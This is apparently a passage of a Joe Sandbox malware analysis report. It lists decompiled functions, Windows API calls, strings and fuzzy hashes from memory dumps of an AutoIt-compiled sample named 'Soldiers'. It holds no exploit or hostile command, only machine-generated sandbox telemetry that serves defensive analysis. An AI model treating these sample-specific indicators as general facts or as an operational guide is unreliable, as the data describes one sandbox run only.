                                                          • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0091CC32
                                                          • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0091CC48
                                                          • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0091CC53
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                          • String ID: 0
                                                          • API String ID: 464785882-4108050209
                                                          • Opcode ID: f82d20d90b7602bbbc10fb2c721652fdadd76ebd63e9c11c4dc563cbb4928fc1
                                                          • Instruction ID: 4d9de2df2419d910e919e4a67fa1b6e8ce161037c8a438a9c7d72a809402ccc2
                                                          • Opcode Fuzzy Hash: f82d20d90b7602bbbc10fb2c721652fdadd76ebd63e9c11c4dc563cbb4928fc1
                                                          • Instruction Fuzzy Hash: B012DF70644649EFCB25DF25C888BA9B7E8FF49310F1445A9F889CB262C731ED81DB91
                                                          Function 008F27FC Relevance: 47.5, APIs: 12, Strings: 15, Instructions: 298COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: __wcsnicmp$Exception@8Throwstd::exception::exception
                                                          • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                          • API String ID: 2660009612-1645009161
                                                          • Opcode ID: 6e598c443c0f1742d4e193c858d18fa51659a95c0c9b1bd7d3615035f1540a88
                                                          • Instruction ID: 1f2afe554414634cfb681b82bb9a466ca0c185cec790f674a5584769c79bc0d5
                                                          • Opcode Fuzzy Hash: 6e598c443c0f1742d4e193c858d18fa51659a95c0c9b1bd7d3615035f1540a88
                                                          • Instruction Fuzzy Hash: C2A18C31A0020DAFCB24AF64D852FBE7778FF84744F144029FA49AB296EB719E11D651
                                                          Function 00957B95 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • DestroyWindow.USER32(?), ref: 00957BC8
                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00957C87
                                                          • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00957CC5
                                                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00957CD7
                                                          • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00957D1D
                                                          • GetClientRect.USER32(00000000,?,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00957D29
                                                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?), ref: 00957D6D
                                                          • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00957D7C
                                                          • GetStockObject.GDI32(00000011,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00957D8C
                                                          • SelectObject.GDI32(00000000,00000000,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?), ref: 00957D90
                                                          • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00957DA0
                                                          • GetDeviceCaps.GDI32(00000000,0000005A,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?), ref: 00957DA9
                                                          • DeleteDC.GDI32(00000000,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00957DB2
                                                          • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?,?,50000000), ref: 00957DDE
                                                          • SendMessageW.USER32(00000030,00000000,00000001,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00957DF5
                                                          • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000,?,50000000,?,00000004,00000500), ref: 00957E30
                                                          • SendMessageW.USER32(00000000,00000401,00000000,00640000,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00957E44
                                                          • SendMessageW.USER32(00000404,00000001,00000000,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00957E55
                                                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000,?,50000000,?,00000004,00000500), ref: 00957E85
                                                          • GetStockObject.GDI32(00000011,00000001,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?), ref: 00957E90
                                                          • SendMessageW.USER32(00000030,00000000,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?), ref: 00957E9B
                                                          • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00957EA5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                          • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                          • API String ID: 2910397461-517079104
                                                          • Opcode ID: 466b347f8437e2bf7d525cc32d4fe22e3e98d355bf5c211cbc7ff0847e886218
                                                          • Instruction ID: 636dfbd03e7bd970be10c4b2f1321089bd626e290ae1d2a242e425b3cf8fbffd
                                                          • Opcode Fuzzy Hash: 466b347f8437e2bf7d525cc32d4fe22e3e98d355bf5c211cbc7ff0847e886218
                                                          • Instruction Fuzzy Hash: 0CA16F72A14619BFEB14DBA9DC4AFAEBB69EF45710F004114FA15E72E0C770AD40DBA0
                                                          Function 0094B353 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetErrorMode.KERNEL32(00000001), ref: 0094B361
                                                          • GetDriveTypeW.KERNEL32(?,00972C4C,?,\\.\,00970980), ref: 0094B43E
                                                          • SetErrorMode.KERNEL32(00000000,00972C4C,?,\\.\,00970980), ref: 0094B59C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: ErrorMode$DriveType
                                                          • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                          • API String ID: 2907320926-4222207086
                                                          • Opcode ID: 3aa59244a0d32424159744ff09c7d26bab7c88acfc270ea546bf2223b33a2dab
                                                          • Instruction ID: 77c4310e09177c3920ba300bd146673dd79b702c95d4e7c49a84d9c05df13a0b
                                                          • Opcode Fuzzy Hash: 3aa59244a0d32424159744ff09c7d26bab7c88acfc270ea546bf2223b33a2dab
                                                          • Instruction Fuzzy Hash: EE51B132B44209EB8F00DBB8DA82E7CB7A5FBC4744B244515F406A72A1E779EE41CB52
                                                          Function 0096A041 Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 455windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 0096A0F7
                                                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0096A1B0
                                                          • SendMessageW.USER32(?,00001102,00000002,?), ref: 0096A1CC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window
                                                          • String ID: 0
                                                          • API String ID: 2326795674-4108050209
                                                          • Opcode ID: 226e771a023b7463866798f9092985fd6d1e65861b4382dd9ddc25c33d404e8e
                                                          • Instruction ID: b365a091212a16b2c900316c59ce2137c0f7f63dd73fbb8fcd94b9e91cbfa5ab
                                                          • Opcode Fuzzy Hash: 226e771a023b7463866798f9092985fd6d1e65861b4382dd9ddc25c33d404e8e
                                                          • Instruction Fuzzy Hash: 9002F031108301AFD715CF14CC59BAABBE8FF85714F048A1DF99AA62A1C774D840DF92
                                                          Function 0096AF18 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetSysColor.USER32(00000012,00000000,?,?,?,?,?,?,?,?,?,0096AC1F,?,?,00000000,?), ref: 0096AF51
                                                          • SetTextColor.GDI32(?,?,00000000,?,?,?,?,?,?,?,?,?,0096AC1F,?,?,00000000), ref: 0096AF55
                                                          • GetSysColorBrush.USER32(0000000F,?,?,?,?,?,?,?,0096AC1F,?,?,00000000,?,?), ref: 0096AF6B
                                                          • GetSysColor.USER32(0000000F,?,?,?,?,?,?,?,0096AC1F,?,?,00000000,?,?), ref: 0096AF76
                                                          • CreateSolidBrush.GDI32(?,?,?,?,?,?,?,?,0096AC1F,?,?,00000000,?,?), ref: 0096AF7B
                                                          • GetSysColor.USER32(00000011,?,?,?,?,?,?,?,0096AC1F,?,?,00000000,?,?), ref: 0096AF93
                                                          • CreatePen.GDI32(00000000,00000001,00743C00,?,?,?,?,?,?,?,0096AC1F,?,?,00000000,?,?), ref: 0096AFA1
                                                          • SelectObject.GDI32(?,00000000,?,?,?,?,?,?,?,0096AC1F,?,?,00000000,?,?), ref: 0096AFB2
                                                          • SetBkColor.GDI32(?,00000000,?,?,?,?,?,?,?,0096AC1F,?,?,00000000,?,?), ref: 0096AFBB
                                                          • SelectObject.GDI32(?,?,?,?,?,?,?,?,?,0096AC1F,?,?,00000000,?,?), ref: 0096AFC8
                                                          • InflateRect.USER32(?,000000FF,000000FF,?,?,?,?,?,?,?,0096AC1F,?,?,00000000,?,?), ref: 0096AFE7
                                                          • RoundRect.GDI32(?,?,?,?,?,00000005,00000005,?,?,?,?,?,?,?,0096AC1F,?), ref: 0096AFFE
                                                          • GetWindowLongW.USER32(00000000,000000F0,?,?,?,?,?,?,?,0096AC1F,?,?,00000000,?,?), ref: 0096B013
                                                          • SendMessageW.USER32(00000000,0000000E,00000000,00000000,?,?,?,?,?,?,?,0096AC1F,?,?,00000000,?), ref: 0096B05F
                                                          • GetWindowTextW.USER32(00000000,00000000,00000001,?,?,?,?,?,?,?,0096AC1F,?,?,00000000,?,?), ref: 0096B086
                                                          • InflateRect.USER32(?,000000FD,000000FD,?,?,?,?,?,?,?,0096AC1F,?), ref: 0096B0A4
                                                          • DrawFocusRect.USER32(?,?,?,?,?,?,?,?,?,0096AC1F,?), ref: 0096B0AF
                                                          • GetSysColor.USER32(00000011,?,?,?,?,?,?,?,0096AC1F), ref: 0096B0BD
                                                          • SetTextColor.GDI32(?,00000000,?,?,?,?,?,?,?,0096AC1F), ref: 0096B0C5
                                                          • DrawTextW.USER32(?,00000000,000000FF,?,?,?,?,?,?,?,?,?,0096AC1F), ref: 0096B0D9
                                                          • SelectObject.GDI32(?,0096AC1F,?,?,?,?,?,?,?,0096AC1F), ref: 0096B0F0
                                                          • DeleteObject.GDI32(?,?,?,?,?,?,?,?,0096AC1F), ref: 0096B0FB
                                                          • SelectObject.GDI32(?,?,?,?,?,?,?,?,?,0096AC1F), ref: 0096B101
                                                          • DeleteObject.GDI32(?,?,?,?,?,?,?,?,0096AC1F), ref: 0096B106
                                                          • SetTextColor.GDI32(?,?,?,?,?,?,?,?,?,0096AC1F), ref: 0096B10C
                                                          • SetBkColor.GDI32(?,?,?,?,?,?,?,?,?,0096AC1F), ref: 0096B116
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                          • String ID:
                                                          • API String ID: 1996641542-0
                                                          • Opcode ID: ad34897b9120979a2e35cf41e286523b9aef99076efa469aae9905cdc4b932af
                                                          • Instruction ID: 56709a3993c2ede406c8e10f187d1df40bc576d45e9199da82c9cec520ce3327
                                                          • Opcode Fuzzy Hash: ad34897b9120979a2e35cf41e286523b9aef99076efa469aae9905cdc4b932af
                                                          • Instruction Fuzzy Hash: 05615B72914218EFDF119FA4DC48AAEBB79EF48320F104115F919AB2A1D7759980DF90
                                                          Function 00968FFA Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SendMessageW.USER32(?,00000158,000000FF,0000014E,?,?,?,?,?), ref: 009690EA
                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 009690FB
                                                          • CharNextW.USER32(0000014E), ref: 0096912A
                                                          • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 0096916B
                                                          • SendMessageW.USER32(?,00000158,000000FF,00000158,?,0000014E,009A77C4), ref: 00969181
                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00969192
                                                          • SendMessageW.USER32(?,000000C2,00000001,0000014E,?,?,?,?,?), ref: 009691AF
                                                          • SetWindowTextW.USER32(?,0000014E,?,?,?,?,?), ref: 009691FB
                                                          • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00969211
                                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00969242
                                                          • _memset.LIBCMT ref: 00969267
                                                          • SendMessageW.USER32(00000000,00001060,00000001,00000004,00000000,0000014E,009A77C4), ref: 009692B0
                                                          • _memset.LIBCMT ref: 0096930F
                                                          • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00969339
                                                          • SendMessageW.USER32(?,00001074,?,00000001,00000000,0000014E,009A77C4), ref: 00969391
                                                          • SendMessageW.USER32(?,0000133D,?,?), ref: 0096943E
                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00969460
                                                          • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 009694AA
                                                          • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 009694D7
                                                          • DrawMenuBar.USER32(?), ref: 009694E6
                                                          • SetWindowTextW.USER32(?,0000014E,?,?,?,?,?), ref: 0096950E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                          • String ID: 0
                                                          • API String ID: 1073566785-4108050209
                                                          • Opcode ID: 1ce615a0bb90782029b8acfc3f78f148d12e9e65087aeb96e3a1475a8a7f862f
                                                          • Instruction ID: 2636b3c1dd4b1c09e1288c00ebae87828f67006bfaa03a83fd61ea17d1401a99
                                                          • Opcode Fuzzy Hash: 1ce615a0bb90782029b8acfc3f78f148d12e9e65087aeb96e3a1475a8a7f862f
                                                          • Instruction Fuzzy Hash: 1FE1BF71904219EFDF209F94CC89EEE7BBCEF4A710F108156F919AA290D7748A81DF61
                                                          Function 00964ECC Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetCursorPos.USER32(?), ref: 00965007
                                                          • GetDesktopWindow.USER32(?), ref: 0096501C
                                                          • GetWindowRect.USER32(00000000), ref: 00965023
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00965085
                                                          • DestroyWindow.USER32(?), ref: 009650B1
                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 009650DA
                                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 009650F8
                                                          • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 0096511E
                                                          • SendMessageW.USER32(?,00000421,?,?), ref: 00965133
                                                          • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00965146
                                                          • IsWindowVisible.USER32(?), ref: 00965166
                                                          • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00965181
                                                          • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00965195
                                                          • GetWindowRect.USER32(?,?), ref: 009651AD
                                                          • MonitorFromPoint.USER32(?,?,00000002), ref: 009651D3
                                                          • GetMonitorInfoW.USER32(00000000,?), ref: 009651ED
                                                          • CopyRect.USER32(?,?), ref: 00965204
                                                          • SendMessageW.USER32(?,00000412,00000000), ref: 0096526F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                          • String ID: ($0$tooltips_class32
                                                          • API String ID: 698492251-4156429822
                                                          • Opcode ID: a636d0550697e7fbae41e0536e6484fb059ae3b13f4b213cdc873baea59d9812
                                                          • Instruction ID: 34713acdc6a720ae119ab77320742b4e8d859c04019e7a56480e237e0e942793
                                                          • Opcode Fuzzy Hash: a636d0550697e7fbae41e0536e6484fb059ae3b13f4b213cdc873baea59d9812
                                                          • Instruction Fuzzy Hash: FCB19B71618740AFDB04DF69C884B6ABBE4FF89314F008A1CF5999B291D771EC45CB92
                                                          Function 0094498A Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetFileVersionInfoSizeW.VERSION(?,?), ref: 0094499C
                                                          • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 009449C2
                                                          • _wcscpy.LIBCMT ref: 009449F0
                                                          • _wcscmp.LIBCMT ref: 009449FB
                                                          • _wcscat.LIBCMT ref: 00944A11
                                                          • _wcsstr.LIBCMT ref: 00944A1C
                                                          • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00944A38
                                                          • _wcscat.LIBCMT ref: 00944A81
                                                          • _wcscat.LIBCMT ref: 00944A88
                                                          • _wcsncpy.LIBCMT ref: 00944AB3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                          • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                          • API String ID: 699586101-1459072770
                                                          • Opcode ID: 7f8cd66502b2e5086de1beabdb80faa3505f7e7b3bd31135abf0e68f3d8578b4
                                                          • Instruction ID: 17d98e1d9a3a876f00ddfb78b77c7bc16341085e8e43fd78cb7c60ef6b0638a8
                                                          • Opcode Fuzzy Hash: 7f8cd66502b2e5086de1beabdb80faa3505f7e7b3bd31135abf0e68f3d8578b4
                                                          • Instruction Fuzzy Hash: B8412172A04205BEEB15AB349C47FBF7BBCEFD5710F00445AFA04E61D2EB349A0196A5
                                                          Function 008E2BA9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 008E2C8C
                                                          • GetSystemMetrics.USER32(00000007), ref: 008E2C94
                                                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 008E2CBF
                                                          • GetSystemMetrics.USER32(00000008), ref: 008E2CC7
                                                          • GetSystemMetrics.USER32(00000004), ref: 008E2CEC
                                                          • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 008E2D09
                                                          • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 008E2D19
                                                          • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 008E2D4C
                                                          • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 008E2D60
                                                          • GetClientRect.USER32(00000000,000000FF), ref: 008E2D7E
                                                          • GetStockObject.GDI32(00000011,00000000), ref: 008E2D9A
                                                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 008E2DA5
                                                            • Part of subcall function 008E2714: GetCursorPos.USER32(?,?,009A77B0,?,009A77B0,009A77B0,?,0096C5FF,00000000,00000001,?,?,?,0091BD40,?,?), ref: 008E2727
                                                            • Part of subcall function 008E2714: ScreenToClient.USER32(009A77B0,?,?,0096C5FF,00000000,00000001,?,?,?,0091BD40,?,?,?,?,?,00000001), ref: 008E2744
                                                            • Part of subcall function 008E2714: GetAsyncKeyState.USER32(?,?,0096C5FF,00000000,00000001,?,?,?,0091BD40,?,?,?,?,?,00000001,?), ref: 008E2769
                                                            • Part of subcall function 008E2714: GetAsyncKeyState.USER32(?,?,0096C5FF,00000000,00000001,?,?,?,0091BD40,?,?,?,?,?,00000001,?), ref: 008E2777
                                                          • SetTimer.USER32(00000000,00000000,00000028,008E13C7,00000000,000000FF), ref: 008E2DCC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
